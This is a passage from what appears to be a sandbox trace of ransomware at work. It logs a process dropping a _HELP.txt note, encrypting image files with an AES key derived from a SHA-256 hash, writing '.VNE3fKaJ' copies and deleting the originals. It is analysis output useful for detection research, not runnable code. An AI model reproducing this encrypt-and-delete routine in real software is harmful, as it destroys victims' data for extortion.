CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.315] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\_HELP.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326a4cc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0153.316] GetFileType (hFile=0x454) returned 0x1 [0153.317] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\photograph.png")) returned 0 [0153.317] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0153.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0x284d568 [0153.388] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0153.388] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x454 [0153.446] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.VNE3fKaJ" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0153.446] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.447] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.447] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.447] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.447] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x701d [0153.447] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.448] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.449] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.449] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.449] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.449] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.449] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.449] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.450] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.450] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.450] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.451] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.451] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.451] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.452] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.452] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.452] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.452] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.532] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.532] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.532] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.533] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.533] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.533] WriteFile (in: hFile=0x45c, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.533] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.535] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.535] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.535] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.536] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png")) returned 0 [0153.536] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.537] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.537] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.537] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 